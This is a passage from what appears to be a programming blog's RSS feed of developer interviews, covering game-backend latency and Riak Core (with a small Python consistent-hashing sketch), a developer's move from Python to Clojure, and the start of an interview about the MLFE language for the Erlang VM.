For a typical ecommerce site, a 500 ms latency may be completely unnoticeable. However, in a game, 500 ms could be the difference between winning and losing. So we are constantly concerned with latency. This includes things like time spent serializing&#x2F;deserializing your communications, how much data you are sending up and down the wire, how long you spend accessing the DB, etc.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the main differences between implementing actual games and game development tools?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It is the same as developing any tool&#x2F;lib vs a product that goes directly to consumers. With tools you need to think not just about what the tool does but also about how others will use it: does it have the flexibility to work in N different use cases, etc. With a game you know exactly how your product should behave and can quickly tell when things work and when they don’t. A tool may work great for the designed use case, until some other creative engineer decides to repurpose it in a completely different way. As a tools&#x2F;lib developer your challenge is to have the flexibility to support both.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What was your experience using&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;basho&#x2F;riak_core&quot;&gt;&lt;strong&gt;Riak Core&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;? What did you like and what did you not?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Riak Core is a very cool library but really you have to look at it from two angles.&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Do I buy into the whole Consistent Hashing thing?&lt;&#x2F;li&gt;
&lt;li&gt;Do I want to implement my own solution for this?&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;About two years ago we said yes to the first question; however, getting Riak Core to work in an Elixir environment was just too painful, so we rolled our own solution. It worked well and was actually a bit faster than Riak Core, but it was not nearly as robust and did not handle node failures and handoffs well. Recently the Phoenix and Basho folks got a Hex package that actually works in Elixir and we jumped at the chance to try it out. After some evaluation we decided that the little bit of performance gain we got from our system was outweighed by the expanded functionality that Riak Core provided.&lt;&#x2F;p&gt;
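&lt;p&gt;For readers who haven’t met consistent hashing: a toy ring in Python (a sketch of the concept, nothing like Riak Core’s actual implementation) shows the property that makes it attractive here. Nodes are hashed onto a circle at many virtual points, each key goes to the next point clockwise, and removing a node only remaps the keys that lived on it.&lt;&#x2F;p&gt;

```python
import bisect
import hashlib

def _point(key):
    # deterministic position on the ring for a string key
    return int(hashlib.md5(key.encode()).hexdigest(), 16)

class HashRing:
    """Toy consistent-hash ring with virtual nodes."""

    def __init__(self, nodes=(), vnodes=64):
        self.vnodes = vnodes
        self._ring = []          # sorted list of (point, node)
        for n in nodes:
            self.add_node(n)

    def add_node(self, node):
        # each node claims many virtual points for an even spread
        for i in range(self.vnodes):
            bisect.insort(self._ring, (_point(f"{node}:{i}"), node))

    def remove_node(self, node):
        self._ring = [(p, n) for p, n in self._ring if n != node]

    def node_for(self, key):
        # the first virtual point clockwise from the key owns it
        idx = bisect.bisect(self._ring, (_point(key), ""))
        return self._ring[idx % len(self._ring)][1]
```

The payoff is the handoff behavior the interview praises: when a node joins or leaves, only the keys on its arcs move, so the cluster never reshuffles everything at once.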
&lt;p&gt;&lt;strong&gt;Liked&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Very robust software that handles a lot of error cases for us.&lt;&#x2F;li&gt;
&lt;li&gt;Built-in gossip protocol&lt;&#x2F;li&gt;
&lt;li&gt;Handles data handoffs when new nodes are brought online&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Dislike&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Dependencies that don’t work because Basho bases all their libs&#x2F;tools on Erlang R15&lt;&#x2F;li&gt;
&lt;li&gt;Very heavyweight&lt;&#x2F;li&gt;
&lt;li&gt;Difficult to track down errors deep in the system code&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;&lt;strong&gt;Is there anything you miss from implementing actual videogames?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Working on videogames is a truly unique experience. Not only are you working with very smart engineers, you also get to work closely with Artists, Game Designers, Musicians, and sometimes even Actors. That is a very fun and exciting environment to be in.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>A Pythonist finds a new home at Clojure land</title>
          <pubDate>Fri, 14 Apr 2017 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/a-pythonist-finds-a-new-home-at-clojure-land/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/a-pythonist-finds-a-new-home-at-clojure-land/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/a-pythonist-finds-a-new-home-at-clojure-land/">&lt;p&gt;Welcome back to another interview of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;notamonadtutorial.com&#x2F;&quot;&gt;Not a Monad Tutorial&lt;&#x2F;a&gt;. In this opportunity I decided to interview Facundo Olano, a friend, a teammate, and a developer with a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;facundoolano&quot;&gt;diverse experience&lt;&#x2F;a&gt;. We talked about Python, Node.js, Clojure, Common Lisp and software development in general. Something worth mentioning is that this is not the first time Python and Clojure get mentioned together at Not a Monad Tutorial. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;notamonadtutorial.com&#x2F;indie-languages-interview-pixie-and-timothy-baldridge-cadbc36418dc&quot;&gt;Timothy Baldridge implemented Pixie&lt;&#x2F;a&gt;, a Lisp language inspired by Clojure, in Python.&lt;&#x2F;p&gt;
&lt;p&gt;Vote and discuss at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lobste.rs&#x2F;s&#x2F;nz28ef&#x2F;pythonist_finds_new_home_at_clojure_land&quot;&gt;lobsters&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;65ct5j&#x2F;a_pythonist_finds_a_new_home_at_clojure_land&#x2F;&quot;&gt;reddit&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=14114624&quot;&gt;hn&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-4XmtTGqxc82DyQwcpmr9pw.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;A wallpaper I created for my OpenBSD laptop. Lisp, BSD, Erlang, Rust. We live in the best of all possible worlds.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You are quite in love with Python. Why is that?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Heh, love is a big word, isn’t it? But, yes, I guess for a while I had pretty strong feelings for Python. I still do, to a degree. If you’re going with the love metaphor, let’s say I had a series of shitty girlfriends that didn’t treat me all that well and I didn’t even notice it, then I meet this great woman, this caring and interesting woman that listens to what I have to say and doesn’t, um, force me to wrap everything in a class.&lt;&#x2F;p&gt;
&lt;p&gt;Seriously speaking, I learnt to program in college, arguably at an old age, and there they taught me Pascal (because some folks are convinced that’s still the best way to teach good programming manners), then a fair amount of C++, and lots of Java. Everybody was in love with Java over there and they kind of gave you the impression that that was it: this is as good as programming gets, this is what will get you a job, and it’s so much better than C++, which I already knew wasn’t pleasant to work with. So I got a job programming Java and I loved it; I read all the books, &lt;em&gt;Refactoring&lt;&#x2F;em&gt; and the Design Patterns stuff. But then I had to quit because I was getting behind in college. I got some free time back and I was curious about Python because some former coworkers and other students raved about it.&lt;&#x2F;p&gt;
&lt;p&gt;I got this book &lt;em&gt;Learning Python&lt;&#x2F;em&gt; and went through it top to bottom one summer. I guess I felt scammed, in a way: how come nobody told me about this? I felt I had been wasting my time writing XMLs and type hierarchies, while there was a simpler way to do about everything: dynamic typing gave me polymorphism for free, the data structures were built-in and had literals, string manipulation was just amazingly easy, you could have standalone functions and pass them like values, a lot of the Java design patterns were reduced to one-liners… I guess one of the takeaways of the experience was that sometimes your peers know better than your teachers (or your bosses).&lt;&#x2F;p&gt;
&lt;p&gt;But besides it feeling better than Java, what’s still unique for me about Python is the set of principles that are best expressed in the &lt;em&gt;Zen of Python&lt;&#x2F;em&gt;. It felt like every bit of the language followed those principles and it encouraged you to do the same with your own code; when in doubt about how to tackle something, the Zen of Python would tell you the right way to go. I still follow most of those ideas when I program, regardless of the language.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Before learning Clojure, your&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;facundoolano.wordpress.com&#x2F;2012&#x2F;01&#x2F;31&#x2F;first-impressions-on-common-lisp&#x2F;&quot;&gt;&lt;strong&gt;first experience with a Lisp&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;was with Common Lisp. From what I have talked with you about learning Common Lisp I could sum up that it was a bittersweet experience. Why didn’t you like Common Lisp?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I got interested in Lisp after reading Paul Graham essays. Then there was that bit of Eric Raymond about the religious experience of &lt;em&gt;getting&lt;&#x2F;em&gt; Lisp. After what I went through with Java and Python I made a point about always looking for chances to learn new languages.&lt;&#x2F;p&gt;
&lt;p&gt;But it just didn’t feel right; in a lot of ways it was the opposite of what I loved about Python: the code was very difficult to read (not because of parens or prefix notation, just because it was filled with symbols), and the operator set was huge, with really weird names, and not dynamic at all. I remember it having something like six equality operators for different types. Add to that, it’s an old language with a small community and zero chance of getting a job using it, so it made no sense to invest much time in it, since it wasn’t fun either. But fortunately there are many Lisps, and I already knew right then that I’d give Clojure a chance eventually.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why was the experience with&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;facundoolano.wordpress.com&#x2F;2016&#x2F;03&#x2F;20&#x2F;first-impressions-on-clojure&#x2F;&quot;&gt;&lt;strong&gt;Clojure different&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;? As&lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;65ct5j&#x2F;a_pythonist_finds_a_new_home_at_clojure_land&#x2F;dg97mao&#x2F;&quot;&gt;&lt;strong&gt;stesch said in reddit&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;, Clojure land is in the Java sea. Those are strange waters for a pythonist. What did you like about it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;For starters, it addresses everything that put me off about Common Lisp. It’s more readable. The operator set is big, but very consistent and polymorphic: all core functions work as expected with every data type. It has a strong focus on immutability and functional programming, which CL didn’t have. But it’s also a very pragmatic language: it doesn’t ask you to learn category theory or to know what a functor is in order to get why you would benefit from it. That’s the approach to functional programming that I like. I’m not saying theory isn’t important, just that I’m the kind of programmer whose interest you won’t catch with theory detached from practice. Also, the community is very active and welcoming, and the fact that it’s a JVM language makes it get a lot of attention, considering it’s a Lisp dialect.&lt;&#x2F;p&gt;
&lt;p&gt;Another thing that made me feel at home about Clojure is that it has a strong philosophy and you can tell its design has been driven by it. The philosophy is not the same as the one in Python, and now I understand that that doesn’t really matter. I want consistently opinionated languages rather than bags of features you can bend to program in ten different ways; &lt;em&gt;what&lt;&#x2F;em&gt; the philosophy is is secondary to the fact that &lt;em&gt;there is&lt;&#x2F;em&gt; a philosophy.&lt;&#x2F;p&gt;
&lt;p&gt;The talks by Rich Hickey are enlightening, and every time I watch one I feel like I improved my understanding of the language, even if the talk isn’t about Clojure itself. Kind of like a Zen of Clojure.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you think about the JVM and its community?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I’ve been working to suppress the strong feelings I used to have against Java. I still dislike it as a language and the way of programming it encourages, though. I revisited it a couple of years ago to write some Android apps and nope, still not my cup of tea. Everything just feels convoluted and overengineered; I’d constantly think how much simpler this is in Python or Perl or Ruby or JavaScript. It’s a very programmer-centric view, I’m aware, mostly based on what I enjoy in the day to day, which doesn’t necessarily make sense from a business perspective. There’s a reason why big companies go with Java; I recognize there’s a lot of top-of-the-class software written in it, and it’s fast. I don’t have the background to make a serious assessment of the JVM but I’m pretty sure it’s an amazing piece of software.&lt;&#x2F;p&gt;
&lt;p&gt;The good thing is the JVM can now host other languages, and something as weird as a functional Lisp dialect is fairly close to being popular and you can even get a job with it. That’s a lot to say.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you miss from Python?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Sometimes I say, half-joking, that programming is a branch of literature. In that sense I value elegance and succinctness; I think there can be beauty in code, but I also know that beauty is completely subjective and I can’t argue about one style being better than another. I’m not talking about readability, which is important and more or less measurable; I’m talking about aesthetics. I think Python had that kind of beauty for me, which is harder to get in Clojure. Clojure can be more expressive and it’s more powerful, but it can easily get ugly if you don’t have a lot of discipline. Again: all subjective stuff.&lt;&#x2F;p&gt;
&lt;p&gt;Truth be told, I don’t think I miss Python all that much, at least not while I’m doing Clojure. JavaScript is a different story, JavaScript is a mess. But still, if you bend it in the right directions, it can be a fairly decent functional language. I noticed that Python can’t, there’s stuff that just doesn’t work that way (lambdas come to mind), and that probably would annoy me nowadays. So I guess I’m not married to any language anymore. That’s a good thing, right?&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Your most known projects in Github are written in JavaScript. Do you like coding in JavaScript?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;JavaScript is Frankenstein. As Douglas Crockford showed in &lt;em&gt;The Good Parts&lt;&#x2F;em&gt; years ago, there’s a lot of awful bits and you &lt;em&gt;have&lt;&#x2F;em&gt; to subset the language. That’s gotten worse, because they keep adding stuff to it (some of it really cool, some of it to make it look like Java), and they can’t remove the old stuff, so it has become one of those things you have to agree upfront on which parts you’re going to use and which parts are banned, kind of like C++.&lt;&#x2F;p&gt;
&lt;p&gt;But, as I said, if you pick the right subset it can be good. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;eslint.org&#x2F;&quot;&gt;eslint&lt;&#x2F;a&gt; helps. If you ban &lt;em&gt;this&lt;&#x2F;em&gt; and &lt;em&gt;new&lt;&#x2F;em&gt; and treat objects like maps, most problems go away. If you’re bold you can even pick a set of eslint rules to force immutability. And then there’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;ramdajs.com&quot;&gt;Ramda&lt;&#x2F;a&gt;. That’s the secret sauce; it makes data manipulation a joy, and in some spots I even like its functions better than their Clojure counterparts. The async stuff is weird. I still can’t make up my mind on whether Promises are better than callbacks, but I got used to them. It’s a lousy way of hiding concurrency, though.&lt;&#x2F;p&gt;
&lt;p&gt;I have a fair amount of Node.js projects in GitHub, yes. That’s the killer thing about Node.js: NPM, its ecosystem, this philosophy of small unix-y modules. You have an idea, you write up a file and you’re two commands away from publishing it and getting feedback. No other language I’ve tried reduces the boilerplate to share your work that much. That’s a real boost for Open Source and Collaboration. I recognize it has some bad side effects (mixed module quality, left-pad, etc.), but those are far outweighed by the advantages. I remember Python’s dependency and publishing story being way more cumbersome.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In the last few months you started using Emacs. What do you think about it?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I’ve been putting off a blog post about that. I know I’m glad that I decided not to learn Emacs at the same time that I was learning Clojure. That could have caused me to drop both things. I think there’s this idea that you can’t learn a Lisp without Emacs, and that may have been true before, but now that there’s &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;shaunlebron.github.io&#x2F;parinfer&#x2F;&quot;&gt;parinfer&lt;&#x2F;a&gt; you can safely hack Lisp on most modern editors. Hardcore lispers may not notice what an amazing contribution to the community this is: it makes getting started with Lisp dramatically easier and reachable for people that wouldn’t even consider using something like Emacs.&lt;&#x2F;p&gt;
&lt;p&gt;I pleasantly used Clojure with Sublime and parinfer for almost a year. Then I started reading &lt;em&gt;Coders at work&lt;&#x2F;em&gt; and saw all these amazing hackers mentioning Emacs again and again. It felt like I was missing out on something, so I decided I should give it a try, as a weekend project.&lt;&#x2F;p&gt;
&lt;p&gt;And it was a hell of a weekend. The first lesson I learned was that I was a shitty typist, but that got better as the days went by. Fortunately it was a quiet week at work because I could barely get anything done for a while. One interesting note is that I went through this process with JavaScript, so I could make Emacs my daily editor at work. It wasn’t until I felt comfortable with the editor that I tried it with Clojure. And then I realised my Clojure experience wasn’t complete before. It probably goes the other way around: you get the best out of Emacs when you’re doing Lisp.&lt;&#x2F;p&gt;
&lt;p&gt;I’m not sure I’d recommend it to every programmer, though, especially if they work on a single language that already has a killer editor. Learning Emacs is a really fun and enriching experience, but you have to be prepared to spend a lot of time tuning the editor at first and acknowledge the fact that &lt;em&gt;your Emacs config will be the project of your life&lt;&#x2F;em&gt;, as I read somewhere.&lt;&#x2F;p&gt;
&lt;p&gt;I know I love those times when you realise you are doing something repeatedly, that could be done by a command, and you write it (or, better, you find that someone else wrote it already). That’s when it pays off.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is there any particular Clojure library that you would specially recommend?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jonase&#x2F;kibit&quot;&gt;kibit&lt;&#x2F;a&gt; I find amazing because it’s not only a useful linter (like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jonase&#x2F;eastwood&#x2F;&quot;&gt;eastwood&lt;&#x2F;a&gt; also is), but it teaches you the standard library as you go, which can be a little bit overwhelming when you are starting out. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;bhauman&#x2F;lein-figwheel&quot;&gt;Figwheel&lt;&#x2F;a&gt; is another obvious one that made a big difference for me when I started to play with ClojureScript.&lt;&#x2F;p&gt;
&lt;p&gt;The &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;macchiato-framework.github.io&#x2F;&quot;&gt;Macchiato framework&lt;&#x2F;a&gt; is doing a great job of bringing Node.js to ClojureScript. I noticed some people don’t take Node.js very seriously, but with Clojure being a language that makes such a strong point of leveraging the host platform, the world of possibilities available in NPM can’t be disregarded. There’s another often overlooked fact: you’re much more likely to find a functional programming enthusiast nowadays doing Node.js than in the Java world, so shortening that gap can only bring good to the community.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;candid82&#x2F;joker&quot;&gt;Joker&lt;&#x2F;a&gt; is another great one. It’s a Clojure interpreter written in Go, but what I’ve found incredibly useful is how it works as a linter, which you can easily hook to an editor. It really improved my workflow, catching typos and bugs early while I program.&lt;&#x2F;p&gt;
&lt;p&gt;Finally, in the testing related work I’ve been doing recently I’ve found &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jakemcc&#x2F;lein-test-refresh&quot;&gt;lein-test-refresh&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;weavejester&#x2F;eftest&quot;&gt;eftest&lt;&#x2F;a&gt; to be useful and insightful about how clojure.test and leiningen internals work.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;On your github profile you have many pretty well known open source projects. What motivates you to invest time in them?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I just love programming. I have lots of hobbies, but programming is definitely one of the things that I enjoy the most, the one that gives me the most pleasure. It’s like an itch: I get this idea, or I encounter a need that isn’t addressed by an existing library, or maybe I’m just playing to learn a new technology. I can’t help sitting down and building something until I see it working on the screen and the itch goes away. I learned not to be lazy, to polish it a bit and upload it to GitHub.&lt;&#x2F;p&gt;
&lt;p&gt;Open source is ideal, because you get to work on your own time, you do the stuff you’re interested in and drop the project whenever it bores you. I wish someone would pay me to do that. With a real job it’s harder: sometimes it gets boring, sometimes there’s nothing to do or you depend on someone else to move forward. More often than not you can’t share your work.&lt;&#x2F;p&gt;
&lt;p&gt;And I always liked this process of conceiving a project, executing it and sharing it with others. Not just in software; the same goes for my fiction writing or when I recorded music as a teenager. When I was in high school I didn’t know how to program but I was obsessed with making games, I spent most of my afternoons fiddling with these game maker programs, RPG Maker and such, sharing my creations with friends. Unfortunately internet access was limited at home and they didn’t teach programming in my school, so it wasn’t until much later that I was able to do serious stuff on my own.&lt;&#x2F;p&gt;
&lt;p&gt;During college I did little projects and games but the languages I knew and skills I had weren’t enough to get me very far at the beginning. There was no GitHub, so it was harder to share and find interesting projects to work on. Later I had to juggle between a full-time job and finishing college. It wasn’t until these last couple of years that I got the freedom to work on whatever I want. And I know in a couple of years I’ll have kids and other stuff going on in my life, so I’m trying to enjoy this programming spring as much as I can.&lt;&#x2F;p&gt;
&lt;p&gt;And then there’s the marketing factor. I’m not great at some types of job interviews and my resume may not tell you that much on its own, but I have a portfolio of open source projects that shows I’m a serious coder, a published Android game that proves I can take a personal project to production and a blog that tells you that I reason about my craft and I’m constantly trying to improve it. If you care enough to read it.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are you working on lately?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I work at a Node.js shop, but the team is full of functional enthusiasts. We can’t convince our boss to let us write a production microservice in Clojure or Elixir, or a user interface in Elm. But the boss doesn’t care that much about our integration tests (as long as there &lt;em&gt;are&lt;&#x2F;em&gt; tests). So when someone complained for the zillionth time about how painful it is to write our API integration tests in JavaScript, I proposed migrating them to Clojure. To my surprise, they agreed. So I hacked together this little library to easily do all that we were already doing in our Node.js API tests. And I liked how it turned out, so I’ve &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;facundoolano&#x2F;restpect&quot;&gt;published it on GitHub&lt;&#x2F;a&gt;. Nothing too fancy, but it was a good excuse to escape from JavaScript, and it got three of my coworkers learning Clojure, which is great news.&lt;&#x2F;p&gt;
&lt;p&gt;Other than that, I keep slowly growing my &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;facundoolano&#x2F;advenjure&quot;&gt;advenjure engine&lt;&#x2F;a&gt;; I just &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;facundoolano.github.io&#x2F;house-taken&quot;&gt;published a full game&lt;&#x2F;a&gt; with it, based on a story by Julio Cortázar. I’ve also been doing some &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;cljsbin-bkhgroqzwe.now.sh&#x2F;&quot;&gt;experiments with Macchiato&lt;&#x2F;a&gt;, to write Clojure web apps that run on Node.js. I have this Machine Learning book I’m about to start; we’ll see where that takes me. Node.js microservices still pay my bills. For now, I guess. At some point I hope to be able to get paid for writing Clojure.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>MLFE: ML landing in the Erlang world</title>
          <pubDate>Tue, 15 Nov 2016 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/d-day-invasion-with-mlfe-ml-landing-in-the-erlang-world/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/d-day-invasion-with-mlfe-ml-landing-in-the-erlang-world/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/d-day-invasion-with-mlfe-ml-landing-in-the-erlang-world/">&lt;p&gt;Time has passed since our last interview for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;notamonadtutorial.com&#x2F;&quot;&gt;This is not a Monad Tutorial&lt;&#x2F;a&gt;. OpenBSD released its 6.0 version after 20 years of continues releases without agile, OpenSSL vulnerabilities keep on breeding, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;blog.bugreplay.com&#x2F;post&#x2F;152579164219&#x2F;pornhubdodgesadblockersusingwebsockets&quot;&gt;Pornhub war against ad blockers continued&lt;&#x2F;a&gt;, the Macbook Pro is not that Pro anymore, a new javascript package manager was released by Facebook and last but not least Brexit and Trump are a reality that will shape the new world order.&lt;&#x2F;p&gt;
&lt;p&gt;Going back to our endogamic tech world, I interviewed &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;noisycode.com&#x2F;&quot;&gt;Jeremy Pierre&lt;&#x2F;a&gt; about &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;j14159&#x2F;mlfe&quot;&gt;MLFE&lt;&#x2F;a&gt; or ML Flavoured Erlang. After learning Haskell and playing with Elm I became quite a fan of ADTs and Hindley-Milner type systems, which is why I am really excited by MLFE. I think of it as a way to counterbalance my love for Lisp languages. Let’s add a little bit of ML into our coffee. One of the projects on my To Do list was to implement an ML-like language on top of the Erlang VM&#x2F;BEAM. Instead of reinventing the wheel, I hope to see further by standing upon the shoulders of MLFE. The invasion has begun!&lt;&#x2F;p&gt;
&lt;p&gt;If you have any more questions please let me know via &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;lobste.rs&#x2F;s&#x2F;vw8zb2&#x2F;d_day_invasion_with_mlfe_ml_landing_erlang&quot;&gt;lobsters&lt;&#x2F;a&gt;, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.reddit.com&#x2F;r&#x2F;programming&#x2F;comments&#x2F;5d2ooi&#x2F;dday_invasion_with_mlfe_ml_landing_in_the_erlang&#x2F;&quot;&gt;reddit programming&lt;&#x2F;a&gt; or &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;news.ycombinator.com&#x2F;item?id=12958099&quot;&gt;hn&lt;&#x2F;a&gt;. Au revoir.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-VHoeeRQqosE3Woi37aHFeA.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;2016 MLFE&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is MLFE?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;ML Flavoured Erlang is a statically typed and strict (eagerly evaluated) language for the Erlang VM patterned a little bit after parts of both OCaml and Elm. It’s incredibly early in the language’s development but we already have things like sum types and product types (e.g. tuples, records with row polymorphism) and a pretty basic foreign function interface to Erlang proper. Honestly the language is probably in need of renaming almost entirely because it’s impossible to call Erlang code directly outside of the FFI.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you create an ML language on top of the Erlang VM&#x2F;BEAM?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I appreciate a lot of the practicalities in the Erlang ecosystem, not least of which are the operational aspects of the VM, but I wanted something with faster feedback on type issues than Dialyzer currently provides, along with the brevity and expressiveness that come with features like OCaml or Elm’s ADTs. One of the earliest drivers for this was constantly wishing for Scala’s case classes every time I wrote Erlang (my day job involves both).&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What are the main problems you find while coding in Erlang and while coding in ML like languages?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I don’t often work directly in ML dialects, to be perfectly honest, although I keep trying to find reasons to use them. Maybe that’s a subconscious reason behind starting MLFE.&lt;&#x2F;p&gt;
&lt;p&gt;As mentioned above however I do often work in Scala and its less pervasive approach to pattern matching and second class nature of things like actors on the JVM are often sore points for me. Having said that, it would be really great to have something like Scala’s Future or ScalaZ’s Task in an Erlang VM language as well. Maybe we can build something with MLFE to scratch that itch but it’s a little early to say I think.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How did you implement the type inference algorithm?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
